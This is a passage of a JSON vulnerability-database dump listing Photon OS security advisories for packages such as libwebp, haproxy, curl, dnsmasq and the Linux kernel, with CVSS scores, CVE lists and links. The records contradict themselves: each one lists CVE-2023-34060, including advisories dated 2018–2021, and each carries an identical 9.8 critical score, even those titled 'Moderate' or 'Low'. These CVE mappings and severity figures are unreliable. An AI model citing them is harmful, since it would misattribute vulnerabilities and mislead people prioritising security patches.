"published": "2023-09-14T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-5.0-0095", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-38039"], "modified": "2023-09-14T00:00:00", "id": "PHSA-2023-5.0-0095", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-95", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:32:29", "description": "Updates of ['libwebp'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-29T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-5.0-0061", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1999", "CVE-2023-34060"], "modified": "2023-07-29T00:00:00", "id": "PHSA-2023-5.0-0061", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-61", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:36:32", "description": "Updates of ['haproxy'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-08-22T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-4.0-0455", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-40225"], "modified": "2023-08-22T00:00:00", "id": "PHSA-2023-4.0-0455", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-455", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:50:57", "description": "Updates of ['ruby'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-07T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0096", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31810", "CVE-2023-34060"], "modified": "2021-09-07T00:00:00", "id": "PHSA-2021-4.0-0096", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-96", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:51:09", "description": "Updates of ['dnsmasq'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-03T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0093", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3448", "CVE-2023-34060"], "modified": "2021-09-03T00:00:00", "id": "PHSA-2021-4.0-0093", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-93", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:32", "description": "Updates of ['linux', 'linux-aws', 'linux-secure', 'linux-rt', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-20T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0011", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29154", "CVE-2023-34060"], "modified": "2021-04-20T00:00:00", "id": "PHSA-2021-4.0-0011", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:47", "description": "Updates of ['cassandra'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-03-12T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0003", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17516", "CVE-2023-34060"], "modified": "2021-03-12T00:00:00", "id": "PHSA-2021-4.0-0003", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-3", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:06:51", "description": "Updates of ['openldap'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-3.0-0396", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29155", "CVE-2023-34060"], "modified": "2022-05-23T00:00:00", "id": "PHSA-2022-3.0-0396", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-396", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:07:31", "description": "Updates of ['curl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-04-04T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-3.0-0377", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22623", "CVE-2023-34060"], "modified": "2022-04-04T00:00:00", "id": "PHSA-2022-3.0-0377", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-377", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:32:48", "description": "Updates of ['libX11'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-06-16T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-5.0-0029", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-3138", "CVE-2023-34060"], "modified": "2023-06-16T00:00:00", "id": "PHSA-2023-5.0-0029", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:24:13", "description": "Updates of ['linux', 'linux-aws', 'linux-secure', 'linux-rt', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-24T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-3.0-0144", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25211", "CVE-2023-34060"], "modified": "2020-09-24T00:00:00", "id": "PHSA-2020-3.0-0144", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:24:03", "description": "Updates of ['gnutls'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-29T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-3.0-0146", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24659", "CVE-2023-34060"], "modified": "2020-09-29T00:00:00", "id": "PHSA-2020-3.0-0146", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-146", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:26:58", "description": "Updates of ['cyrus-sasl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-04-06T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-3.0-0077", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19906", "CVE-2023-34060"], "modified": "2020-04-06T00:00:00", "id": "PHSA-2020-3.0-0077", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-77", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:33:57", "description": "Updates of ['libxslt'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-06-17T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0485", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30560", "CVE-2023-34060"], "modified": "2022-06-17T00:00:00", "id": "PHSA-2022-0485", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:33:12", "description": "Updates of ['rsync'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-05T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0503", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29154", "CVE-2023-34060"], "modified": "2022-08-05T00:00:00", "id": "PHSA-2022-0503", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-503", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:33:06", "description": "Updates of ['vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-04T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-0502", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2231", "CVE-2023-34060"], "modified": "2022-08-04T00:00:00", "id": "PHSA-2022-0502", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-502", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:32:04", "description": "Updates of ['go'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-09-20T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0519", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27664", "CVE-2023-34060"], "modified": "2022-09-20T00:00:00", "id": "PHSA-2022-0519", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-519", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:31:39", "description": "Updates of ['redis'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-11-05T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0536", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3647", "CVE-2023-34060"], "modified": "2022-11-05T00:00:00", "id": "PHSA-2022-0536", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-536", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:52:41", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-08-30T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0089", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1333", "CVE-2023-34060"], "modified": "2018-08-30T00:00:00", "id": "PHSA-2018-0089", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-89", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:52:54", "description": "Updates of ['linux', 'linux-esx', 'linux-aws', 'linux-secure'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-08-13T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0083", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12233", "CVE-2023-34060"], "modified": "2018-08-13T00:00:00", "id": "PHSA-2018-0083", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-83", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:47:35", "description": "Updates of ['dnsmasq'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-01-23T00:00:00", "type": "photon", "title": "Low Photon OS Security Update - PHSA-2020-0201", "bulletinFamily": 